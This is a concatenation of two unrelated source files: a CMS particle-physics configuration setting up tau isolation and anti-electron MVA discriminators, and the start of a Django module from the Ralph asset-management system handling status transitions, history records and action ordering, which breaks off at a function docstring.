patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff70")
# Tight WP
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff60")
# VTight WP
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff50")
# VVTight WP
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015 = patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015.clone()
patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015.mapping[0].cut = cms.string("RecoTauTag_tauIdMVADBoldDMwLTv1_WPEff40")
# MVAIso DBoldDM Sequence (2015): raw discriminator first, then all WP multiplexers
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2015Seq = cms.Sequence(
    patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015
    + patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015
    + patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015
    + patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015
    + patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015
    + patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015
    + patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015
)
### Define new anti-e discriminants
antiElectronDiscrMVA6_version = "MVA6v3_noeveto"
## Raw
from RecoTauTag.RecoTau.PATTauDiscriminationAgainstElectronMVA6_cfi import patTauDiscriminationAgainstElectronMVA6
from RecoTauTag.RecoTau.TauDiscriminatorTools import noPrediscriminants
# Raw anti-electron MVA6 output; one training per (ele-match, gamma, GSF) category
# in barrel (BL) and endcap (EC)
patTauDiscriminationByElectronRejectionMVA62018Raw = patTauDiscriminationAgainstElectronMVA6.clone(
    Prediscriminants = noPrediscriminants, #already selected for MiniAOD
    vetoEcalCracks = False, #keep tau candidates in EB-EE cracks
    mvaName_NoEleMatch_wGwoGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL',
    mvaName_NoEleMatch_wGwoGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC',
    mvaName_NoEleMatch_woGwoGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL',
    mvaName_NoEleMatch_woGwoGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC',
    mvaName_wGwGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL',
    mvaName_wGwGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC',
    mvaName_woGwGSF_BL = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL',
    mvaName_woGwGSF_EC = 'RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC'
)
## anti-e 2018 WPs
from RecoTauTag.RecoTau.PATTauDiscriminantCutMultiplexer_cfi import patTauDiscriminantCutMultiplexer
# VLoose (WPeff98): per-category cut on the raw MVA6 output.
# Categories 0/2/5/7 are barrel, 8/10/13/15 endcap, for the four
# (ele-match, gamma, GSF) trainings.
patTauDiscriminationByVLooseElectronRejectionMVA62018 = patTauDiscriminantCutMultiplexer.clone(
    PATTauProducer = patTauDiscriminationByElectronRejectionMVA62018Raw.PATTauProducer,
    Prediscriminants = patTauDiscriminationByElectronRejectionMVA62018Raw.Prediscriminants,
    toMultiplex = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw"),
    key = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw","category"),
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(2),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(5),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(7),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(8),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(10),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(13),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff98'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(15),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff98'),
            variable = cms.string('pt')
        )
    )
)
# Loose (WPeff90): clone of VLoose with the per-category cuts tightened
patTauDiscriminationByLooseElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(2),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(5),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(7),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(8),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(10),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(13),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff90'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(15),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff90'),
            variable = cms.string('pt')
        )
    )
)
# Medium (WPeff80): clone of VLoose with the per-category cuts tightened
patTauDiscriminationByMediumElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(2),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(5),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(7),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(8),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(10),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(13),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff80'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(15),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff80'),
            variable = cms.string('pt')
        )
    )
)
# Tight (WPeff70): clone of VLoose with the per-category cuts tightened
patTauDiscriminationByTightElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(2),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(5),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(7),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(8),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(10),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(13),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff70'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(15),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff70'),
            variable = cms.string('pt')
        )
    )
)
# VTight (WPeff60): clone of VLoose with the per-category cuts tightened
patTauDiscriminationByVTightElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
    mapping = cms.VPSet(
        cms.PSet(
            category = cms.uint32(0),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(2),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(5),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(7),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(8),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(10),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(13),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff60'),
            variable = cms.string('pt')
        ),
        cms.PSet(
            category = cms.uint32(15),
            cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff60'),
            variable = cms.string('pt')
        )
    )
)
### Put all anti-e tau-IDs into a sequence
patTauDiscriminationByElectronRejectionSeq = cms.Sequence(
    patTauDiscriminationByElectronRejectionMVA62018Raw
    +patTauDiscriminationByVLooseElectronRejectionMVA62018
    +patTauDiscriminationByLooseElectronRejectionMVA62018
    +patTauDiscriminationByMediumElectronRejectionMVA62018
    +patTauDiscriminationByTightElectronRejectionMVA62018
    +patTauDiscriminationByVTightElectronRejectionMVA62018
)
### put all new MVA tau-Id stuff to one Sequence
_patTauMVAIDsSeq2017v2 = cms.Sequence(
    patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTSeq
    +patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTSeq
    +patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTSeq
    +patTauDiscriminationByElectronRejectionSeq
)
# Default: 2017v2 trainings plus the 2015 training
patTauMVAIDsSeq = _patTauMVAIDsSeq2017v2.copy()
patTauMVAIDsSeq += patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2015Seq
# Variant with the 2017v1 training appended, used for 94X MiniAODv1 inputs
_patTauMVAIDsSeqWith2017v1 = _patTauMVAIDsSeq2017v2.copy()
_patTauMVAIDsSeqWith2017v1 += patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2017v1Seq
from Configuration.Eras.Modifier_run2_nanoAOD_94XMiniAODv1_cff import run2_nanoAOD_94XMiniAODv1
for era in [run2_nanoAOD_94XMiniAODv1,]:
    era.toReplaceWith(patTauMVAIDsSeq,_patTauMVAIDsSeqWith2017v1)
# embed new MVA tau-Ids into new tau collection
slimmedTausUpdated = cms.EDProducer("PATTauIDEmbedder",
    src = cms.InputTag('slimmedTaus'),
    tauIDSources = cms.PSet() # PSet defined below in era dependent way
)
# ID-name -> discriminator-module map for the 2017v2 trainings, consumed by
# the PATTauIDEmbedder above (assigned era-dependently to tauIDSources)
_tauIDSources2017v2 = cms.PSet(
    #oldDM
    byIsolationMVArun2v1DBoldDMwLTraw2017v2 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw'),
    byVVLooseIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT'),
    byVLooseIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT'),
    byLooseIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT'),
    byMediumIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT'),
    byTightIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT'),
    byVTightIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT'),
    byVVTightIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT'),
    #newDM
    byIsolationMVArun2v1DBnewDMwLTraw2017v2 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw'),
    byVVLooseIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT'),
    byVLooseIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT'),
    byLooseIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT'),
    byMediumIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT'),
    byTightIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT'),
    byVTightIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT'),
    byVVTightIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT'),
    #oldDMdR0p3
    byIsolationMVArun2v1DBdR03oldDMwLTraw2017v2 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw'),
    byVVLooseIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT'),
    byVLooseIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT'),
    byLooseIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT'),
    byMediumIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT'),
    byTightIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT'),
    byVTightIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT'),
    byVVTightIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT'),
)
_tauIDSources2017v1 = cms.PSet(
byIsolationMVArun2v1DBoldDMwLTraw2017v1 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1'),
byVVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1'),
byVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1'),
byLooseIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1'),
byMediumIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1'),
byTightIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1'),
byVTightIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1'),
byVVTightIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1')
)
_tauIDSourcesWith2017v1 = cms.PSet(
_tauIDSources2017v2.clone(),
_tauIDSources2017v1
)
_tauIDSources2015 = cms.PSet(
byIsolationMVArun2v1DBoldDMwLTraw2015 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015'),
byVLooseIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015'),
byLooseIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015'),
byMediumIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015'),
byTightIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015'),
byVTightIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015'),
byVVTightIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015')
)
_tauIDSourcesWith2015 = cms.PSet(
_tauIDSources2017v2.clone(),
_tauIDSources2015
)
slimmedTausUpdated.tauIDSources=_tauIDSourcesWith2015
for era in [run2_nanoAOD_94XMiniAODv1,]:
era.toModify(slimmedTausUpdated,
tauIDSources = _tauIDSourcesWith2017v1
)
_antiETauIDSources = cms.PSet(
againstElectronMVA6Raw2018 = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw"),
againstElectronMVA6category2018 = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw","category"),
againstElectronVLooseMVA62018 = cms.InputTag("patTauDiscriminationByVLooseElectronRejectionMVA62018"),
againstElectronLooseMVA62018 = cms.InputTag("patTauDiscriminationByLooseElectronRejectionMVA62018"),
againstElectronMediumMVA62018 = cms.InputTag("patTauDiscriminationByMediumElectronRejectionMVA62018"),
againstElectronTightMVA62018 = cms.InputTag("patTauDiscriminationByTightElectronRejectionMVA62018"),
againstElectronVTightMVA62018 = cms.InputTag("patTauDiscriminationByVTightElectronRejectionMVA62018")
)
_tauIDSourcesWithAntiE = cms.PSet(
slimmedTausUpdated.tauIDSources.clone(),
_antiETauIDSources
)
slimmedTausUpdated.tauIDSources=_tauIDSourcesWithAntiE
patTauMVAIDsSeq += slimmedTausUpdated
|
<filename>src/ralph/lib/transitions/models.py
# -*- coding: utf-8 -*-
import inspect
import logging
import operator
from collections import defaultdict
import reversion
from django import forms
from django.conf import settings
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import FieldDoesNotExist
from django.db import models, transaction
from django.db.models.base import ModelBase
from django.db.models.signals import (
post_delete,
post_migrate,
post_save,
pre_save
)
from django.dispatch import receiver
from django.utils.functional import curry
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from django_extensions.db.fields.json import JSONField
from ralph.admin.helpers import (
get_content_type_for_model,
get_field_by_relation_path
)
from ralph.attachments.models import Attachment
from ralph.lib.mixins.models import TimeStampMixin
from ralph.lib.transitions.conf import TRANSITION_ATTR_TAG
from ralph.lib.transitions.exceptions import (
TransitionModelNotFoundError,
TransitionNotAllowedError
)
from ralph.lib.transitions.fields import TransitionField
_transitions_fields = {}
logger = logging.getLogger(__name__)
TRANSITION_ORIGINAL_STATUS = (0, 'Keep orginal status')
class CycleError(Exception):
    """Raised when the action dependency graph contains a cycle."""
    pass
def _generate_transition_history(
    instance, transition, user, attachment, history_kwargs, action_names, field
):
    """Return history object (without saving it) based on parameters.

    Resolves human-readable names for the source and target statuses via the
    field's choices; falls back to None when a status cannot be resolved.

    Args:
        instance: the transitioned model instance.
        transition: the executed Transition.
        user: the user who ran the transition.
        attachment: optional Attachment produced by an action.
        history_kwargs: extra form data to record.
        action_names: verbose names of the executed actions.
        field: name of the transitioned field (e.g. 'status').
    """
    field_value = getattr(instance, field, None)
    try:
        target = instance._meta.get_field(
            field
        ).choices.from_id(int(transition.target)).name
    except (ValueError, TypeError):
        target = None
    try:
        source = instance._meta.get_field(
            field
        ).choices.from_id(int(field_value)).name
    except (ValueError, TypeError):
        # BUGFIX: int(None) raises TypeError (the field may be unset), which
        # the previous `except ValueError` did not catch.
        source = None
    return TransitionsHistory(
        transition_name=transition.name,
        content_type=get_content_type_for_model(instance._meta.model),
        object_id=instance.pk,
        logged_user=user,
        attachment=attachment,
        kwargs=history_kwargs,
        actions=action_names,
        source=source,
        target=target
    )
def _get_history_dict(data, instance, runned_funcs):
    """Build a {field label: value} dict describing the form data used.

    For every executed action, picks the form values whose keys are
    prefixed with the action's name and resolves them to human-readable
    labels and values, skipping fields flagged 'exclude_from_history'.
    """
    history = {}
    for func in runned_funcs:
        # form keys are namespaced as '<action_name>__<field_name>'
        defaults = {
            key.split('__')[1]: value
            for key, value in data.items()
            if key.startswith(func.__name__)
        }
        for k, v in defaults.items():
            if func.form_fields[k].get('exclude_from_history', False):
                continue
            value = v
            try:
                field = get_field_by_relation_path(instance, k)
                if isinstance(field, models.ForeignKey):
                    # record the related object's string representation
                    value = str(field.rel.to.objects.get(pk=v))
                    field_name = field.verbose_name
                elif isinstance(field, models.ManyToOneRel):
                    # v is a collection of related objects here
                    value = ', '.join(map(str, v))
                    field_name = v.model._meta.verbose_name_plural
                else:
                    field_name = field.verbose_name
            except FieldDoesNotExist:
                # not a model field - fall back to the action's form field
                field = func.form_fields[k]['field']
                if isinstance(field, forms.ChoiceField):
                    value = dict(field.choices).get(int(v))
                    field_name = field.label
            history[str(field_name)] = value
    return history
def _check_type_instances(instances):
"""Function check type of instances.
Conditions:
- transition can run only objects with the same type.
"""
if not all(
map(lambda x: isinstance(instances[0], x.__class__), instances)
):
raise NotImplementedError()
def _check_and_get_transition(obj, transition, field):
    """Check and get transition from parameters.

    Args:
        obj: The object from database.
        transition: The transition object or a string (transition name).
        field: The field as a string.

    Returns:
        The transition object.

    Raises:
        TransitionModelNotFoundError: An error occurred when transition is
            not found for object's class.
    """
    # the model must have been registered by the TransitionWorkflowBase
    # metaclass (i.e. it declares at least one TransitionField)
    if obj.__class__ not in _transitions_fields.keys():
        raise TransitionModelNotFoundError(
            'Model {} not found in registry'.format(obj.__class__)
        )
    if isinstance(transition, str):
        # resolve a transition name to the Transition row for this field
        transition_model = obj.transition_models[field]
        transition = Transition.objects.get(
            name=transition,
            model=transition_model,
        )
    return transition
def _check_instances_for_transition(instances, transition):
    """Check in respect of the instances source status.

    Args:
        instances: Objects to check.
        transition: The transition object.

    Raises:
        TransitionNotAllowedError: An error occurred when one or more of
            instances not allowed transition.
    """
    errors = defaultdict(list)
    for instance in instances:
        # transition.source holds the allowed source status ids
        if instance.status not in [int(s) for s in transition.source]:
            errors[instance].append(_('wrong source status'))
    # let every action veto the transition through its precondition hook
    for func in transition.get_pure_actions(instances[0]):
        error = func.precondition(instances)
        if error:
            for instance, error_details in error.items():
                errors[instance].append(error_details)
    if errors:
        raise TransitionNotAllowedError(
            'Transition {} is not allowed for objects'.format(transition.name),
            errors
        )
def _check_action_with_instances(instances, transition):
    """Run each action's optional ``validation`` hook against the instances."""
    first = instances[0]
    for action in transition.get_pure_actions(first):
        validator = getattr(action, 'validation', lambda x: True)
        validator(instances)
def _check_user_perm_for_transition(user, transition):
if not user:
return True
return user.has_perm('{}.{}'.format(
transition.permission_info['content_type'].app_label,
transition.permission_info['codename']
))
def _create_graph_from_actions(actions, instance):
graph = {}
actions_set = set()
for action in actions:
actions_set.add(action.name)
func = getattr(instance, action.name)
graph.setdefault(action.name, [])
for requirement in getattr(func, 'run_after', []):
graph.setdefault(requirement, []).append(action.name)
return {k: v for (k, v) in graph.items() if k in actions_set}
def _sort_graph_topologically(graph):
# calculate input degree (number of nodes pointing to particular node)
indeg = {k: 0 for k in graph}
for node, edges in graph.items():
for edge in edges:
indeg[edge] += 1
# sort graph topologically
# return nodes which input degree is 0
no_requirements = set([a for a in indeg if indeg.get(a, 0) == 0])
while no_requirements:
action_name = no_requirements.pop()
# for each node to which this one is pointing - decrease input degree
for dependency in graph[action_name]:
indeg[dependency] -= 1
# add to set of nodes ready to be returned (without nodes pointing
# to it)
if indeg[dependency] == 0:
no_requirements.add(dependency)
yield action_name
if any(indeg.values()):
raise CycleError("Cycle detected during topological sort")
def _order_actions_by_requirements(actions, instance):
    """Yield actions ordered so every ``run_after`` prerequisite comes first."""
    by_name = {action.name: action for action in actions}
    dependency_graph = _create_graph_from_actions(actions, instance)
    for action_name in _sort_graph_topologically(dependency_graph):
        yield by_name[action_name]
@transaction.atomic
def run_field_transition(
    instances, transition_obj_or_name, field, data=None, **kwargs
):
    """
    Execute all actions assigned to the selected transition.
